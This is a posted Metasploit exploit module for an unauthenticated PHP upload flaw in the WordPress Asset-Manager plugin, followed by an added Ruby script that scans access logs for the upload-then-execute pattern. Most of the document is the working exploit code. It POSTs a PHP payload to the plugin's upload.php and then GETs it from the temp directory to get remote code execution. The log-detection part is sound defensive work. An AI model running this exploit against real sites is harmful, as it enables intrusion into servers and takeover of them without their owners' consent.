WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. The plugin's upload handler accepts PHP files: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart body with the PHP file in the plugin's "Filedata" field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # upload.php echoes the stored file name on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The uploaded file is served directly from the plugin's temp directory
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
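Added example (not part of the post or of the Metasploit module): a Ruby check that scans web-server access logs for the two-step pattern this module leaves behind, a POST to the plugin's upload.php answered with 200 followed by a GET for a .php file under wp-content/uploads/assets/temp/ from the same client. The log lines, IP addresses and file name are constructed, and the 300-second correlation window is an assumption.

```ruby
require 'time'

# Constructed Apache combined-format log lines; the clients and the .php name are made up.
SAMPLE_LOG = <<~LOG
  198.51.100.7 - - [26/May/2012:10:01:02 +0000] "GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
  198.51.100.7 - - [26/May/2012:10:01:05 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 41 "-" "Mozilla/5.0"
  198.51.100.7 - - [26/May/2012:10:01:06 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzvh.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
  203.0.113.9 - - [26/May/2012:10:02:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/logo.png HTTP/1.1" 200 812 "-" "Mozilla/5.0"
  203.0.113.9 - - [26/May/2012:10:03:00 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 403 0 "-" "Mozilla/5.0"
LOG

LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/

# The two paths the module touches: the unauthenticated upload handler and the temp directory it writes to.
UPLOAD_RE   = %r{/wp-content/plugins/asset-manager/upload\.php\z}
TEMP_PHP_RE = %r{/wp-content/uploads/assets/temp/[^/]+\.php\z}

# Parse one log line into a hash, or nil if it is not in combined format.
def parse_line(line)
  m = LOG_RE.match(line) or return nil
  { ip: m[:ip], time: Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method], path: m[:path].split('?').first, status: m[:status].to_i }
end

# Return one alert per successful upload (POST to upload.php with status 200) that is followed,
# within `window` seconds and from the same client, by a GET for a .php file in the temp directory.
def find_upload_exec_chains(log_text, window: 300)
  entries = log_text.each_line.map { |l| parse_line(l.strip) }.compact
  uploads = entries.select { |e| e[:method] == 'POST' && e[:path] =~ UPLOAD_RE && e[:status] == 200 }
  uploads.map do |up|
    hit = entries.find do |e|
      e[:ip] == up[:ip] && e[:method] == 'GET' && e[:path] =~ TEMP_PHP_RE &&
        e[:time] >= up[:time] && e[:time] - up[:time] <= window
    end
    hit && { ip: up[:ip], uploaded_at: up[:time], executed: hit[:path], status: hit[:status] }
  end.compact
end

if __FILE__ == $0
  find_upload_exec_chains(SAMPLE_LOG).each do |a|
    puts "ALERT #{a[:ip]} uploaded at #{a[:uploaded_at]} then fetched #{a[:executed]} (HTTP #{a[:status]})"
  end
end
```

Any .php served from that temp directory is worth alerting on even when the matching upload is missing from the log, since the 403 in the sample shows what a blocked upload looks like and the served file, not the POST, is the indicator that matters.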